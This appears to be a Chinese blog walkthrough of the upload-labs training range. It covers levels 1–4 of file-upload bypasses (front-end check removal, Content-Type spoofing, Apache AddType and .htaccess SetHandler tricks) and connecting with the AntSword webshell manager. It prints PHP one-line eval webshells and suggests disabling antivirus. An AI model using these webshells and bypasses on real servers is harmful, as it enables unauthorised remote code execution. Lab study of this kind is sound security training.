27_文件上传毛病、upload-labs靶场安装、蚁剑安装、蚁剑利用、AntSword-Loa
文件上传毛病先容https://i-blog.csdnimg.cn/direct/419ff6e4463e49bba917e14f622d4349.png
https://i-blog.csdnimg.cn/direct/7bd80c90d8eb46298e2df9c5725c5c46.png
部署一下upload-labs靶场,
解压出来时会报毒,我关掉了防火墙,用的是新的600多KB,旧的谁人有些bug
网盘:或者github下载
http://r4.sgwbox.com/fileshare/?tcid=n3686A122601C5&code=Z19HfjOQSJ7QpJ4bdXu37gAuUfRP-v1E4-ADV-Tjsi3zAI-D&cmd=list
github项目地点:https://github.com/c0ny1/upload-labs
https://i-blog.csdnimg.cn/direct/db1813a63e64423cbf8015732b35fe85.png
pass-1
https://i-blog.csdnimg.cn/direct/11c166d6144841328ac3c6f6b03bc241.png
限制是在前端做的。直接上传,上传失败。
准备一个webshell.php 国内叫木马,国外叫webshell
<?php
// 测试有没有上传成功
phpinfo();
?> https://i-blog.csdnimg.cn/direct/264372e4659b4ee69a26d7f8576f1fb3.png
https://i-blog.csdnimg.cn/direct/329af6a09f634f50abc86da89047d13d.png
因为是前端限制,所以可以直接找到验证文件类型的事故,进行删除即可。
https://i-blog.csdnimg.cn/direct/226414f9b8164fdc93f3e9dc75262f2e.png
火狐浏览器可以,edg反倒不行,用火狐
https://i-blog.csdnimg.cn/direct/0587166a8af340abb128e0e947dc360e.png
右键复制图像链接,打开
https://i-blog.csdnimg.cn/direct/7c30ce1144c1499f9b9ffd1df742a4b7.png
https://i-blog.csdnimg.cn/direct/0c7669b5a4e940c889670bbd1a1c2c13.png
安装“蚁剑”— webshell的管理工具
新版本比力好用,但是要初始化,老版本解压就能用,但是感觉不太好用
老版本直接解压用
新版解压后初始化一下
资源链接:http://r4.sgwbox.com/fileshare/?tcid=n3686A122601C5&code=Z19HfjOQSJ7QpJ4bdXu37gDq1lD-ZPql3H9vTryV_YnlAMG1&cmd=list
提取码:无
https://i-blog.csdnimg.cn/direct/1707e5cbedfd4f5da683d547753adcc7.png
https://i-blog.csdnimg.cn/direct/c1690aa9864547fabbcfbc02b01ada81.png
https://i-blog.csdnimg.cn/direct/b200216f7bb549349af9c63dec8aa0d7.png
https://i-blog.csdnimg.cn/direct/70987afbb877431a8b8bebbd8b524ace.png
https://i-blog.csdnimg.cn/direct/d1307968a8604878b0fee05b7f48a52c.png
https://i-blog.csdnimg.cn/direct/345c27d43eed4fcb8d7f9b71f434b4a4.png
https://i-blog.csdnimg.cn/direct/9366ba45d71245d49065428a7f979bc3.png
利用蚁剑链接一句话木马
https://i-blog.csdnimg.cn/direct/2a034464164f4e6c9e3ff7573867f7fc.png
https://i-blog.csdnimg.cn/direct/7b1f4a06e73148a39fe5d0532a9a2fa8.png
https://i-blog.csdnimg.cn/direct/012b28ceeff7400baa6d45b7700107ac.png
https://i-blog.csdnimg.cn/direct/93803f3b4a1f4a389a5a353de9ad853e.png
https://i-blog.csdnimg.cn/direct/ff7701ce654849939348aaa71079e955.png
pass-2
https://i-blog.csdnimg.cn/direct/7a73bb1408f04568a907e032d455f479.png
前次测试可以用webshell谁人,能传那么一句话木马php也能传
第二关检查的是MIME类型(Content-Type)
先查看一下源码 注意,网站有题目就重装,大概杀毒软件杀掉了
https://i-blog.csdnimg.cn/direct/ab7159fea1e44de4b870716f83ea8732.png
https://i-blog.csdnimg.cn/direct/7487cc6a5fbc42e798cc42b30a1e9ef2.png
所以直接抓包,将Content-Type修改为 文件类型即可(好比:image/png)
https://i-blog.csdnimg.cn/direct/bd32ba21aa6b463e84c638f9f92d52f5.png
https://i-blog.csdnimg.cn/direct/e52c621be10949baa5119de050cb053e.png
https://i-blog.csdnimg.cn/direct/e6f003d1b3db42359854187d56dd9ad9.png
pass-3
看一下源码,是黑名单限制。 那么抓包的时候删webshell.php后缀能行嘛,不行,因为试了下,最后复制图像链接没有表现,解析不出来。 换个思绪
https://i-blog.csdnimg.cn/direct/c58839bff8f541559ccc7262ac5382cb.png
服务器端必要有一个配置(有的真真相况下确实有该配置)偶尔候web服务器这儿是有这样的设置的,那可以用这样的方法区绕过
[*]默认咱们的环境没有该配置,所以手动添加一下。 我测试用的一直都是小皮2016老版本
https://i-blog.csdnimg.cn/direct/de7a93a54b084e4c8241eec631641679.png
在配置中添加
AddTypeapplication/x-httpd-php .phtml .php3 .php5 .phps .php
// apache会认识.phtml .php3 .php5 .phps .php后缀的文件,然后交给php解析器解析
// 默认不加,apache只认识.php https://i-blog.csdnimg.cn/direct/52fa1b663e8f4ee6b2354e0089119fab.png
修改完成之后,保存重启服务。
https://i-blog.csdnimg.cn/direct/57a5cd055e5b4b81bb7a56a065551e73.png
https://i-blog.csdnimg.cn/direct/75b1228c95bb45ca801f78719b502cb3.png
练习:
默写php中的一句话木马
<?php
// 一句话木马,这个有多种写法,都可以
// @:不显示报错
// 注意,超级全局变量都是大写
@eval($_REQUEST['xxx']);
@eval($_GET['xxx']);
@eval($_POST['xxx']);
assert($_GET['xxx']);
?> 写法上还有免杀的写法,自行百度
https://i-blog.csdnimg.cn/direct/015480853910481c990406ba0bfd2140.png
pass-4
https://i-blog.csdnimg.cn/direct/e5036d76d1ff42139355d76afa605693.png
会发现4比3多了很多限制,都是黑名单,第四关的绕过方法可用于第三关
https://i-blog.csdnimg.cn/direct/8cb71c7ea629447ab15d624a54658d61.png
首先,application/x-httpd-php 的作用是在.htaccess文件所在的目录下,全部文件apache都会将其给到PHP解析,那么这个文件是可以上传的,因为源码里没有限制这个文件
.htaccess文件:apache的配置文件,优先见效。
SetHandler application/x-httpd-php
在.htaccess文件所在的目录下,全部文件apache都会将其给到PHP解析。
1、创建.htaccess文件
https://i-blog.csdnimg.cn/direct/a7f5ef315211456592af92f387bccddc.png
2、第四关中,点上传.htaccess文件
https://i-blog.csdnimg.cn/direct/78f4abc01a8745eb8cb955d6a537c4c5.png
3、上传一句话木马(修改后缀为图片类型),可以被解析,之后可以被蚁剑连接
https://i-blog.csdnimg.cn/direct/db6b35700867487c8171461df4ec93b7.png
https://i-blog.csdnimg.cn/direct/562a403beb764db686c7926a767707c3.png
4、删除.htaccess文件(后面的实验会有影响)
其他关卡参考互联网
[*]upload-labs_upload labs-CSDN博客
[*]https://www.cnblogs.com/huajiaobuxiango/p/15968800.html
文件前次毛病防御
https://i-blog.csdnimg.cn/direct/c91c8964505f4f3b9564030fee47ecac.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]